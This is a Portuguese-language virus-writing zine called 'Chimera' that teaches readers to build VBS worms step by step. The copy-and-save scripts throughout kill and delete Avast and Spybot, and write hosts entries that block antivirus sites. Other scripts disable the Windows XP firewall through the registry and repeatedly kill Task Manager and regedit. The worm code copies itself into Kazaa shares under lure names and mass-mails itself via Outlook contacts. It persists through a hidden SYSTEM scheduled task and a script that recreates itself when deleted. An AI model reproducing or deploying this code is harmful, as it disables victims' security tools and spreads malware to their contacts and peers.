Beruflich Dokumente
Kultur Dokumente
Chimera
1995-2006
BrasCow / Kdex
brascow@hotmail.com / darshu_14@hotmail.com
http://chimera.namoral.com
Torna-te consciente de tua ignorncia, isto , identifique o que precisa
aprender para melhorar a si mesmo - Scrates.
Sumrio
Stealth Parte 1......................................1
- Ocultando arquivos..........................................1
- Usando VbHide...............................................3
Finalizando processos.......................................4
Matando o Antivrus (Avast!)................................6
Deletando arquivos..........................................7
Matando Antivrus On-line...................................9
O arquivo Hosts.............................................9
Matando o Firewall do Windows XP SP2.......................12
Alterando as configuraes do Firewall no registro.........12
Matando o anti-Spyware (SpyBot)............................14
Replicao..........................................16
- Fazendo o cdigo se replica................................17
- Replicao por P2P.........................................18
- Replicao por e-mail......................................19
Ativao............................................21
-
Iniciar
Iniciar
Iniciar
Criando
Poliformismo........................................27
Residncia..........................................29
- Ocultado arquivos
Deixar um vrus invisvel possvel
uso de um programa chamado attrib.exe, que
Windows, como Win98, XP SP1, SP2. O attrib
atributos de arquivos, como exemplo deixar
somente leitura, entre outros atributos no
de como usar.
attrib [+R | -R] [+A | -A] [+S | -S] [+H | -H] [[unidade:] [caminho] arquivo] [/S [/D]
Exemplo de uso do attrib em um arquivo no diretrio C:\ chamado Chimera.txt
Ex: attrib +R +A +S +H C:\chimera.txt
Tabela de parmetros
Valores
Chimera
Definio
Define um atributo
Limpa um atributo
/s
/d
Figura 01
Executando o attrib, ele mostra todas as propriedades dos arquivos no
seu diretrio no canto esquerdo, e no canto diretrio o nome dos arquivos
direita. Perceba que o arquivo chimera.txt tem a propriedade A, que
significa que ele um arquivo de leitura-gravao, agora vamos deixar este
arquivo oculto, digite o seguinte: attrib +H C:\chimera.txt
Figura 02
Caso tenha digitado corretamente, o arquivo Chimera.txt pra ter
ficado oculto no sistema, execute o attrib e veja como ficaram as
propriedades do arquivo chimera.txt na figura abaixo.
Figura 03
Veja que o arquivo chimera.txt, ficou oculto no sistema e que o
parmetro H esta sendo exibido, indicando as suas propriedades.
Este foi um exemplo bsico, agora vamos passar este conhecimento para
um cdigo em VBS, para que o nosso vrus venha a deixar os seus rastros
ocultos.
Chimera
- Usando VbHide
Vimos que com o programa attrib possvel deixar arquivos ocultos no
entre outras coisas, e assim dificultando a sua localizao e se tornando
invisvel no sistema, mas ao executar o command para executar o attrib
aberta uma janela do command de que logo aps executar o comando fechada,
graas ao parmetro /c do command. Agora que tal deixar esta ao realmente
invisvel onde esta janela fique totalmente invisvel, para isso usado o
parmetro VbHide, que permite que janelas executadas por um cdigo em VBS
fique oculta para os usurios. Copie o cdigo a seguir e salve como
Stealth3.vbs:
REM Tutorial Chimera
DIM WSH
Set WSH = CreateObject ("Wscript.Shell")
WSH.Run ("command /c +H C:\chimera.txt"),VbHide
A nica diferena neste cdigo do exemplo Stealth3, que foi acrescentar o
VbHide na ultima linha do cdigo. Veja que a janela do command que antes
erra exibida e depois encerrada j no abre mais na tela, vamos a outro
exemplo simples, Copie o cdigo a seguir e salve como Stealth4.vbs:
REM Tutorial Chimera
DIM WSH
Set WSH = CreateObject ("Wscript.Shell")
WSH.Run ("command /c ping 127.0.0.1"),VbHide
Veja que nada acontece, mas caso verifique quais processos esto rodando
pressionando Ctrl + Alt + Del ,este processo s estar visvel no
Gerenciador de tarefas do Windows (taskmgr.exe).
Chimera
- Finalizando processos
Acredito que at o mais leigo dos usurios j tenha finalizado um
processo que estava rodando no sistema utilizando a seqncia clssica das
teclas Ctrl + Alt + Del, e selecionou algum processo e finalizou.
Para estar fazendo mesma coisa vamos usar um outro programa nativo
de algumas verses Windows (Windows XP SP1, SP2), chamado taskkill, no
lugar do Ctrl + Alt + Del, que nos permite finalizar processos em execuo
na memria atravs de linhas de comando pelo command do MS-DOS, com isso
podemos finalizar Antivrus, firewall entre outros programas.
Abaixo mostrada uma lista dos parmetros que vamos usar e a forma
como usar:
Taskkill [/F] [/IM NOME_DO_PROCESSO_.EXE][/T]
Parmetros
Definio
/F
/IM
/T
Chimera
Agora vamos passar este exemplo para um cdigo em VBS, Copie o cdigo
a seguir e salve como Kill1.vbs:
REM Tutorial Chimera
DIM WSH
Set WSH = CreateObject ("Wscript.Shell")
WSH.Run ("wordpad.exe")
Wscript.Sleep 5000
WSH.Run ("command /c taskkill /F /IM wordpad.exe /T"),VbHide
Chimera
Figura 04
Exemplo do Autoruns em execuo
O Autoruns possui um timo help, onde no ser necessrio estar
informando o que contem cada aba do programa, pois acredito que qualquer
duvida o auxilio do help pode estar resolvendo.
Chimera
Figura 05
Agora vamos passar este exemplo para um cdigo em VBS, Copie o cdigo a
seguir e salve como KillAVAST!1.vbs:
REM Tutorial Chimera
DIM WSH
Set WSH = CreateObject ("Wscript.Shell")
WSH.Run ("command /c taskkill /F /IM ashserv.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM ashdisp.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM aswupdsv.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM ashmaisv.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM ashwebsv.exe /T"),VbHide
- Deletando arquivos
s vezes s finalizar o processo em memria no o suficiente, pois
o mesmo pode vir a ser executado outra vez, assim que o sistema
reiniciado, para resolver este problema um simples fato de deletar o
arquivo pode resolver totalmente o problema, abaixo mostrado como deletar
arquivos de um sistema, mas antes de deletar um arquivo que esteja em
execuo na memria necessrio finaliza-lo antes, como foi visto nos
tpicos anteriores.
Para estar fazendo os testes, faa uma copia do arquivo calc.exe que
fica dentro da pasta, C:\WINDOWS\system32 copie para C:\ (raiz), mude o
nome do arquivo para chimera.exe e Copie o cdigo a seguir e salve como
Alguma coisa.vbs, dentro de C:\ (raiz).
Aps digitar o cdigo execute o arquivo chamado chimera, que uma
copia da calculadora do Windows, logo depois execute o KillDEL1.VBS.
REM Tutorial Chimera
DIM DEL, FSO, WSH
Set FSO = CreateObject ("Scripting.FileSystemObject")
Set WSH = CreateObject ("Wscript.Shell")
On Error resume next
WSH.Run ("command /c taskkill /F /IM chimera.exe /T"),VbHide
wscript.sleep 2000
Set DEL = FSO.DeleteFile("Chimera.exe")
Chimera
OBS: Este exemplo acima deleta todos os arquivos de um diretrio com o nome
de chimera, tome cuidado, caso tenha algum arquivo importante com este
nome, pois ele ser deletado.
Sntese do DeleteFile()
Set Varivel = FSO.DeleteFile(Caminho\Nome_rquivo.extenso)
Tambm podemos deletar todos os arquivos de uma mesma extenso dentro
de um diretrio utilizando o seguinte: (*.Exenteso) ou mesmo deletar
todos os arquivos de um mesmo nome dentro de um diretrio como:
(nome_arquivo.*), como foi mostrado no cdigo KillDEL1.VBS.
Este cdigo um simples exemplo de como finaliza o processo e depois
deleta o arquivo que estava em execuo. Note que tambm foi utilizada uma
funo chamada On error resume next, que determina diante de um erro, que
a execuo do programa prossiga para o prximo passo.
Agora s passar este conhecimento para finalizar e deletar os arquivos do
avast!, Copie o cdigo a seguir e salve como KillAVAST!2.vbs:
REM Tutorial Chimera
DIM WSH, DEL, FSO
Set WSH = CreateObject ("Wscript.Shell")
Set FSO = CreateObject ("Scripting.FileSystemObject")
WSH.Run ("command /c taskkill /F /IM ashserv.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM ashdisp.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM aswupdsv.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM ashmaisv.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM ashwebsv.exe /T"),VbHide
wscript.sleep 30000
On error resume next
Set DEL = FSO.DeleteFile("C:\Arquivos de Programas\Alwil
Software\Avast4\ashserv.exe")
Set DEL = FSO.DeleteFile("C:\Arquivos de Programas\Alwil
Software\Avast4\ashdisp.exe")
Set DEL = FSO.DeleteFile("C:\Arquivos de Programas\Alwil
Software\Avast4\aswupdsv.exe")
Set DEL = FSO.DeleteFile("C:\Arquivos de Programas\Alwil
Software\Avast4\ashmaisv.exe")
Set DEL = FSO.DeleteFile("C:\Arquivos de Programas\Alwil
Software\Avast4\ashwebsv.exe")
Chimera
(security.symantec.com)
(housecall.trendmicro.com)
Figuras 6
Exemplos de dois sites que fornecem uma verificao antivrus on-line
- O arquivo Hosts
O arquivo HOSTS um arquivo especial do sistema operacional. Ele
capaz de forar a resoluo de certos nomes (ou sites na Internet) para
endereos IP especficos. Dessa forma, voc pode bloquear sites, fazer com
que um endereo entre em uma pgina diferente, entre outras coisas.
Arquivos HOSTS so usados tanto para objetivos maliciosos como para
melhorar a vida do usurio na Internet.
Arquivo HOSTS est em locais diferentes dependendo do sistema operacional.
Veja uma tabela com a localizao dele nos sistemas mais comuns:
Sistema
Windows 9x/ME
Local
%WINDIR%\hosts
/etc/hosts
Netware
SYS:ETC/HOSTS
Chimera
Figura 7
Exemplo de um arquivo HOSTS aberto no Bloco de Notas
Vamos a um exemplo para compreender o funcionamento do arquivo Hosts.
Ex:
Figura 8
Neste exemplo foi inserida a seguinte linha abaixo como mostra figura X:
Ex: 200.221.2.45 www.vxbrasil.com
Onde toda vez que for digitado o site www.vxbrasil.com, o sistema
verificara o arquivo Hosts para ver se alguma instruo ao seguinte site,
caso alguma instruo ele verifica para qual IP deve redirecionar o site,
como neste exemplo o IP ser 200.221.2.45.
Agora vamos passar esta idia para um cdigo em VBS, para que o nosso
vrus esteja redirecionando alguns sites de antivrus On-line e assim
deixando indisponvel este tipo de servio, Copie o cdigo a seguir e salve
como KillAVW1.vbs:
REM
DIM FSO, F
On Error Resume Next
Set FSO = CreateObject ("Scripting.FileSystemObject")
Set F = FSO.OpenTextFile("C:\WINDOWS\system32\drivers\etc\hosts",8,false)
F.writeLine "0.0.0.0 housecall.trendmicro.com"
F.writeLine "0.0.0.0 www.windowsecurity.com"
F.writeLine "0.0.0.0 www.pandasoftware.com"
F.writeLine "0.0.0.0 us.mcafee.com"
F.writeLine "0.0.0.0 www.bitdefender.com"
F.writeLine "0.0.0.0 support.f-secure.com"
F.writeLine "0.0.0.0 www.ravantivirus.com"
F.writeLine "0.0.0.0 onlinescan.avast.com"
F.writeLine "0.0.0.0 www3.ca.com"
F.writeLine "0.0.0.0 www.kaspersky.com"
F.writeLine "0.0.0.0 www.commandondemand.com"
F.writeLine "0.0.0.0 www.virustotal.com"
F.Close
Chimera
10
Figura 9
O arquivo Hosts pode ser usado para outras aes como foi dito no comeo
deste assunto, procure imaginar outras utilidades.
Lista de alguns sites de Antivrus entre outros:
housecall.trendmicro.com
www.windowsecurity.com
www.pandasoftware.com
us.mcafee.com
www.bitdefender.com
support.f-secure.com
www.ravantivirus.com
onlinescan.avast.com
www3.ca.com
www.kaspersky.com
www.commandondemand.com
www.virustotal.com
security.symantec.com
support.f-secure.com
online.drweb.com
www.drweb.com
www.avast.com
www.asw.cz
www.iavs.net
www.iavs.cz
www.safer-networking.org
www.pestpatrol.com
www.networksafety.com
www.trojanhunter.com
www.net-peeker.com
www.f-secure.com
www.abacre.com
www.eset.com
www.nod32.com
www.webimmune.net
www.antivirus.com.br
www.sophos.com
www.analogx.com
www.r-tt.com
Chimera
11
Nome da chave
EnableFirewall
DisableNotifications
DoNotAllowExceptions
Chimera
Dado
Hab / Des
Tipo
Desabilitado
REG_DWORD
Habilitado
REG_DWORD
Habilitado
REG_DWORD
Desabilitado
REG_DWORD
Desabilitado
REG_DWORD
Habilitado
REG_DWORD
12
Cdigo comentado:
DIM WSH
Declarao da varivel WSH
Set WSH = Createobject("Wscript.Shell")
Aqui ligada a varivel WSH com o objeto Wscript.Shell, que tem por
objetivo trabalhar com executar arquivos, ler o registro, entre outras
coisas.
WSH.RegWrite "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\Fi
rewallPolicy\StandardProfile\EnableFirewall",0,"REG_DWORD
Aqui escrito o valor EnableFirewall no caminho
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile no registro do Windows, com o valor 0 do tipo REG_DWORD,
que desabilita o Firewall.
WSH.RegWrite "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\Fi
rewallPolicy\StandardProfile\DisableNotifications",1,"REG_DWORD"
escrito o valor DisableNotifications no caminho
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile no registro do Windows, com o valor 1 do tipo REG_DWORD,
que desabilita a notificao do Firewall quando bloqueai algum programa.
WSH.RegWrite "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\Fi
rewallPolicy\StandardProfile\DoNotAllowExceptions",0,"REG_DWORD"
Aqui escrito o valor DoNotAllowExceptions no caminho
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile no registro do Windows, com o valor 0 do tipo REG_DWORD,
que desabilita a notificao do Firewall quando bloqueia algum programa,
sem excees.
Chimera
13
Cdigo
Copie o cdigo a seguir e salve como KillSB1.vbs:
REM Tutorial Chimera
DIM WSH, DEL, FSO
Set WSH = CreateObject ("Wscript.Shell")
Set FSO = CreateObject ("Scripting.FileSystemObject")
WSH.Run ("command /c taskkill /F /IM blindman.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM SpybotSD.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM TeaTimier.exe /T"),VbHide
WSH.Run ("command /c taskkill /F /IM Update.exe /T"),VbHide
wscript.sleep 50000
On error resume next
Set DEL = FSO.DeleteFile("C:\Arquivos de programas\Spybot - Search &
Destroy\*.exe")
Set DEL = FSO.DeleteFile("C:\Arquivos de programas\Spybot - Search &
Destroy\*.dll")
Set DEL = FSO.DeleteFolder("C:\Arquivos de programas\Spybot - Search &
Destroy\*.*")
A nica parte que nos interessa neste cdigo a seguinte abaixo, pois o
resto j foi comentado antes.
Sntese do DeleteFolder()
Variavel.DeleteFolder(Caminho\Nome_Pasta_a_ser_deletada)
Comentando o cdigo:
On error resume next
Continua a execuo do programa caso encontre algum erro.
Set DEL = FSO.DeleteFile("C:\Arquivos de programas\Spybot - Search &
Destroy\*.exe")
A varivel DEL deleta todos os arquivos *.exe, que se encontra neste
caminho, "C:\Arquivos de programas\Spybot - Search & Destroy\*.exe",
utilizando o objeto FSO.DeleteFile.
Set DEL = FSO.DeleteFile("C:\Arquivos de programas\Spybot - Search &
Destroy\*.dll")
A varivel DEL deleta todos os arquivos *.dll, que se encontra neste
caminho, "C:\Arquivos de programas\Spybot - Search & Destroy\*.dll",
utilizando o objeto FSO.DeleteFile.
Set DEL = FSO.DeleteFolder("C:\Arquivos de programas\Spybot - Search &
Destroy\*.*")
A varivel DEL deleta todas as pastas *.*, que se encontra neste
caminho, "C:\Arquivos de programas\Spybot - Search & Destroy\*.*",
utilizando o objeto FSO.DeleteFolder.
Chimera
14
Cdigo
Copie o cdigo a seguir e salve como KillTOOL1.vbs:
REM Tutorial Chimera
DIM WSH, REP
Set WSH = CreateObject ("Wscript.Shell")
REP = 0
While REP <> 1
Wscript.Sleep 1000
WSH.Run ("command /c taskkill /F /IM regedit.exe /T"), VbHide
WSH.Run ("command /c taskkill /F /IM msconfig.exe /T"), VbHide
WSH.Run ("command /c taskkill /F /IM taskmgr.exe /T"), VbHide
Wend
Cdigo comentado:
DIM WSH, REP
Declarao das variveis WSH, REP
Set WSH = CreateObject ("Wscript.Shell")
Aqui ligada a varivel WSH ao objeto Wscript.Shell
REP = 0
A variavel REP tem o valor igual zero (0)
While REP <> 1
Inicia um loopin, enquanto a varivel REP for <> (diferente) de 1,
repete os comando abaixo.
Wscript.Sleep 1000
Esta funo interrompe a execuo do cdigo por um segundo
WSH.Run ("command /c taskkill /F /IM regedit.exe /T"), VbHide
Executa o command que por sua vez executa o programa taskkill com alguns
parmetros para finalizar o processo regedit.exe, tambm executa a funo
VbHide para deixar a janela invisvel.
WSH.Run ("command /c taskkill /F /IM msconfig.exe /T"), VbHide
Executa o command que por sua vez executa o programa taskkill com alguns
parmetros para finalizar o processo regedit.exe, tambm executa a funo
VbHide para deixar a janela invisvel.
WSH.Run ("command /c taskkill /F /IM taskmgr.exe /T"), VbHide
Executa o command que por sua vez executa o programa taskkill com alguns
parmetros para finalizar o processo regedit.exe, tambm executa a funo
VbHide para deixar a janela invisvel.
Wend
Fim do looping
Chimera
15
Replicao
Introduo
Provavelmente a maior revoluo de toda a era da informtica, com
certeza foi o surgimento da internet, onde de inicio no passava de algumas
universidades e bases militares com os seus computadores entre ligados para
troca de informaes, com o passar do tempo empresas comearam a transforma
esta rede de computadores em negcios lucrativos, com a produo de peas e
equipamentos. Com isso empresas de diversos seguimentos comearam a se
conectar esta rede de computadores, que agora no s entre universidades
e bases militares, mas para ampliar os seus negcios e substituir seus
enormes arquivos de papel por computadores.
Agora qualquer pessoal poderia ter um microcomputador dentro de casa,
e se conectar a internet para qualquer finalidade, como pagar suas contas
ou mesmo fazer compra de produtos na internet, como possvel ver no diaa-dia, mas a internet tambm possibilitou a pea que faltava ao grande
quebra cabea dos criadores de vrus, a forma de distribuir seus vrus pelo
mundo em questo muito curta de tempo e com uma poder enorme de alcance.
Nos anos 80 a forma de propagao dos vrus era atravs da troca de
disquetes, uma forma muito lenta onde os casos de infeco eram bem pouco,
veja baixo um mapa do mundo, onde mostra uma infeco global de um vrus.
Figura 10
Imagem dos paises infectados pelo Worm Kama Sutra, mais de 500 mil PCs
Infectados. Fonte terra/tecnologia
Chimera
16
Cdigo comentado:
DIM FSO, CHM
Declarao das variaveis FSO e CHM
Set FSO = CreateObject ("Scripting.FileSystemObject")
Liga a varivel FSO ao objeto FileSystemObject
Set CHM = FSO.GetFile ("Wscript.ScriptFullName")
Liga a varivel CHM ao prprio arquivo do cdigo que esta em execuo,
usando a funo Wscript.ScriptFullName, que indica o caminho completo para
o script que est sendo executado.
CHM.Copy ("C:\chimera.vbs")
Copia a varivel CHM usando a funo Copy, a varialve CHM contem o
contedo do prprio cdigo, a copia feita para C:\ (raiz) com o nome de
chimera.vbs
CHM.Copy ("C:\BrasCow.vbs")
Faz a mesma coisa que a linha acima, com a unica diferena do nome que
aqui BrasCow
CHM.Copy ("C:\Kdex.vbs")
Faz a mesma coisa que a linha acima, com a unica diferena do nome que
aqui Kdex
Chimera
17
Cdigo comentado:
comentada somente a parte mais importante do cdigo, pois as outras
partes j foram comentadas diversas vezes em outros tpicos deste ZINE.
Na replicao do vrus dentro da pasta do Kazaa utilize nomes sugestivos,
que possam ser procurados por outros usurios, como nome de cracks, filmes
porns etc.
PATH = WSH.RegRead ("HKCU\Software\Kazaa\LocalContent\DownloadDir")
Varivel PATH recebe o contedo da chave DownloadDir, pois DownloadDir
possui o caminho no sistema onde esta localizado a pasta com o
compartilhamento do Kazaa.
Set CHM = FSO.GetFile ("Wscript.ScriptFullName")
Liga a varivel CHM ao prprio arquivo do cdigo que esta em execuo,
usando a funo Wscript.ScriptFullName, que indica o caminho completo para
o script que est sendo executado.
On error resume next
Continua a execuo do cdigo mesmo que seja encontrado algum erro.
CHM.Copy (PATH & "\Emulador PS2.exe.vbs")
Copia a varivel CHM usando a funo Copy, a varialve CHM contem o
contedo do prprio cdigo, a copia feita para o caminho quem a varivel
PACH contem e salva o arquivo com o nome de Emulador PS2.exe.vbs
CHM.Copy (PATH & "\Emulador PS2.zip.VBS")
Faz mesma coisa que o cdigo acima, com a nica diferena de salvar o
arquivo com o nome de PS2.zip.VBS
CHM.Copy (PATH & "\CrackNaruto.exe.vbs")
Faz mesma coisa que o cdigo acima, com a nica diferena de salvar o
arquivo com o nome de CrackNaruto.exe. VBS
Chimera
18
Cdigo comentado:
Dim AddressIndex, AddressBook, ListIndex, MailAddress, Outlook, MAPI
Declarao de todas as variveis
Set OUTLOOK = CreateObject("Outlook.Application")
Liga a varivel OUTLOOK ao objeto Outlook.
Set MAPI = OUTLOOK.GetNameSpace("MAPI")
Acessa o perfil do usurio do Outlook guardando na varivel MAPI.
For ListIndex = 1 to MAPI.AddressList.Count
Inicia varivel ListIndex comea primeira listas de endereo e termina a
ltima.
Set MAILIST = PERF.AddressLists(ListIndex)
Liga a varivel MAILIST a lista de endereos do perfil do usurio do
Outlook.
For AddressIndex = 1 to AddressBook.AddressEntries.Count
Inicia a varivel AddressIndex em 1 e finaliza com o ltimo endereo da
lista.
MailAddress = AddressBook.AddressEntries(AddressIndex)
A varivel MailAddress recebe um e-mail da lista de endereos
Set Mail = Outlook.CreateItem(0)
Se a chave no existir, um novo e-mail criado
Chimera
19
Mail.Recipients.Add(MailAddress)
O destinatario adicionado pela varivel MailAddress
Mail.Subject = "FW : " & Left(CopyTosend,len(CopyTosend)-4)
Assunto do e-mail a ser enviado
Mail.Body = "Chimera, Hello Word..rs"
Mensagem do e-mail a ser enviado.
Mail.Attachments.Add ("C:\Chimera.xls.vbs")
Anexa o arquivo ao e-mail.
Mail.send
Envia o e-mail.
Next
Finaliza o looping, ou melhor, volta para o inicio do looping para uma
verificao, seno continua a prxima instruo.
Next
Finaliza o looping, ou melhor, volta para o inicio do looping para uma
verificao, seno continua a prxima instruo.
Set Outlook = Nothing
Limpa a varivel da memria
Set MAPI = Nothing
Limpa a varivel da memria
Chimera
20
Tcnicas de Ativao
Tcnica de ativao so modos de se ativar um programa, vrus ou
Worm, ou seja, fazer ele rodar automaticamente sem que algum necessite
executa-lo manualmente.
As maneiras abordadas aqui sero :
- Iniciar com o Windows por meio de um valor no registro;
- Iniciar com o Windows por meio da pasta iniciar;
- Iniciar ao abrir arquivo de um outro programa;
- Criando uma tarefa no Windows para iniciar;
Chimera
21
Chimera
22
Chimera
23
Figura 11
Figura 12
Abaixo esto relacionados s principais funes do SCHTASKS
Schtasks
Schtasks
Schtasks
Schtasks
Schtasks
Schtasks
Schtasks
/Run
/End
/Create
/Delete
/Query
/Change
/?
Chimera
24
Abaixo exibida uma tabela com todos os parmetros usado na funo Create.
Valores
Definio
/S
system
/U
username
/P
password
/RU
username
/RP
password
/SC
schedule
/MO
modifier
/D
days
/M
months
/I
idletime
/TN
taskname
/TR
taskrun
/ST
starttime
/SD
startdate
/ED
enddate
Chimera
25
Figura 13
Exemplo de uma tarefa criada
Cdigo em VBS que cria tarefas agendadas Copie o cdigo a seguir e
salve como AGENDAVIRUS.vbs:
REM
DIM WSH, FSO, COPY
Set WSH = CreateObject ("Wscript.Shell")
set FSO = CreateObject ("Scripting.FileSystemObject")
Set COPY = FSO.GetFile(WScript.ScriptFullName)
COPY.copy("C:\chimera.vbs")
WSH.Run ("command /c schtasks /create /SC ONSTART /TN Chimera /TR
C:\chimera.vbs /RP * /RU System"), VbHide
WSH.Run ("command /c attrib +S +H C:\chimera.vbs"), VbHide
WSH.Run ("command /c attrib +S +H C:\WINDOWS\Tasks\Chimera.job"), vbHide
Cdigo comentado
DIM WSH, FSO, COPY
Declarao das variveis
Set WSH = CreateObject ("Wscript.Shell")
Aqui ligada a varivel WSH com o objeto Wscript.Shell, que tem por
objetivo trabalhar com executar arquivos, ler o registro etc.
set FSO = CreateObject ("Scripting.FileSystemObject")
Aqui ligada a varivel a1 com o objeto filesystem, que tem por
objetivo trabalhar com arquivos (leitura, criao, escrita, etc.)
Set COPY = FSO.GetFile(WScript.ScriptFullName)
Liga a varivel COPY ao FSO.GetFile, que tem a funo de retorna um
arquivo, neste caso sendo ele mesmo (o prprio arquivo), utilizando a
funo WScript.ScriptFullName.
COPY.copy("C:\chimera.vbs")
Copia a varivel COPY, que seria o prprio arquivo em execuo para C:\
utilizando a funo .copy como o nome de chimera.vbs
WSH.Run ("command /c schtasks /create /SC ONSTART /TN Chimera /TR
C:\chimera.vbs /RP * /RU System"), VbHide
executado o command com o parmetro /c e o arquivo schtasks para a
criao da tarefa usando os parmetros /create /SC ONSTART /TN Chimera /TR
C:\chimera.vbs /RP * /RU System e por ultimo usado a funo VbHide para
deixar toda a execuo oculta.
WSH.Run ("command /c attrib +S +H C:\chimera.vbs"), VbHide
Aqui executado o command com o parmetro /c e o arquivo attrib com os
parmetros +S +H C:\chimera.vbs que deixa o arquivo chimera.vbs com as
propriedades oculto e arquivo de sistema, e por ultimo usado a funo
VbHide para deixar toda a execuo oculta.
WSH.Run ("command /c attrib +S +H C:\WINDOWS\Tasks\Chimera.job"), vbHide
Aqui executado novamente o command como na linha anterior, a nica
mudana que o arquivo a ficar oculto e como arquivo de sistema o
chimera.job.
Chimera
26
Tcnicas de Polimorfismo
Polimorfismo viral a capacidade de um vrus alterar seu cdigo aps
cada execuo ou infeco.A utilidade do polimorfismo dificultar que o
vrus seja descoberto pelo antivrus.
De acordo com (http://student.dei.uc.pt/~palex/artigo.htm), o
primeiro vrus polimrfico foi criado em 1989, pelo programado blgaro Dark
Avenger.
Chimera
27
Chimera
28
Tcnicas de Residncia
Deixar o cdigo ativo na maquina um dos atos a ser estudados
aqui, pois assim o cdigo pode se proteger e prevenir aes futuras das
partes de AV e FW deixando o vrus ou Worm sem nenhuma ao; pensando
nisso, este tpico foi criado, no cdigo abaixo mostrado como evitar que
o arquivo do cdigo seja removido da maquina; caso o arquivo seja deletado
criado um novo arquivo novamente em seguida caso o cdigo esteja em
execuo na memria da maquina; Copie o cdigo a seguir e salve como
RESIDENT.vbs:
Dim fso, virsrc, arq
set fso = CreateObject("Scripting.FileSystemObject")
set arq = fso.OpenTextFile(Wscript.ScriptFullName,1,false)
virsrc = arq.ReadAll
arq.close
while(1=1)
set arq = fso.CreateTextFile(Wscript.ScriptFullName,true)
arq.write virsrc
arq.close
Wscript.Sleep 4000
Wend
Execute o
execuo delete
mesmo arquivo
segurana maior
Chimera
29
arq.close
O novo arquivo, ou na verdade o arquivo com o vrus fechado
Wscript.Sleep 4000
Essa linha pausa a execuo do cdigo por 4 segundos, importante
para que o usuario tenha a sensao de poder deletar o virus.
Wend
Finaliza o bloco de repetio While.
Chimera
30